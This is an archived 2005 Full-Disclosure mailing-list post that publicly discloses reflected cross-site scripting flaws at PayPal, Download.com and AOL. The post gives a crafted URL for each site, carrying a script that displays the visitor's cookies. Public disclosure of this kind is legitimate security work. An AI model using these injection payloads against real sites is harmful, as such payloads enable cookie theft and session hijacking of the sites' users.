|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] Big Sites That Are Vulnerable To XSS
tuytumadre
att.net
Date: Wed Apr 20 2005 - 23:19:58 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
The following have been previously reposibly disclosed, and, because of the lack of action taken on the venders' parts, full disclosure is necessary to elliminate the threat of what's called "security by obscurity."
paypal.com
http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!--
download.com
http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!--
aol.com*
https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2&siteState=&isSiteStateEncoded=false&lang=en&locale=us&mcAuth=%2FBcAG0Jd4zsAAK80AY99uEJd43cIgAwNtLp%2BJCQAAA%3D%3D
*on aol.com, the victim must be logged in to the website screenname service to be vulnerable.
Regards,
Paul
Greyhats Security
http://greyhatsecurity.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]